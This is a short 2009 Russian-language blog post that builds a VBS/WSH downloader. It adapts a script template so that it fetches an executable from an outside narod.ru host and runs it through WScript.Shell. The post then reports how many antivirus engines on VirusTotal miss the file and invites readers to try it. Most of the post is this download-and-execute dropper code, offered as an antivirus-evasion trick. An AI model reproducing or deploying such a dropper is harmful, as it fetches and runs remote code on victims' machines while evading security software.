(no subject)
Mar. 1st, 2009 07:11 pm![[personal profile]](https://www.dreamwidth.org/img/silk/identity/user.png){kind=small}
ewoke
Проверяем, как реагируют анти на downloader, писаный на vbs/wsh.
Каркас берется отсюда http://paulsadowski.com/WSH/getremotebinaryfile.htm
Меняем начало на
ImageFile = "get_fs.exe"
DestFolder = ".\"
URL = "http://dizzie.narod.ru/get_fs.exe"
Дописываем в конец
Set shell = CreateObject("WScript.Shell")
shell.Run "get_fs.exe"
Имеем http://www.virustotal.com/analisis/64d27e639f6e6a453ee051badadeaf0f
(9/37, Drweb и Nod в пролете)
Кто не испугался, получает иконку от экзешника в подарок)
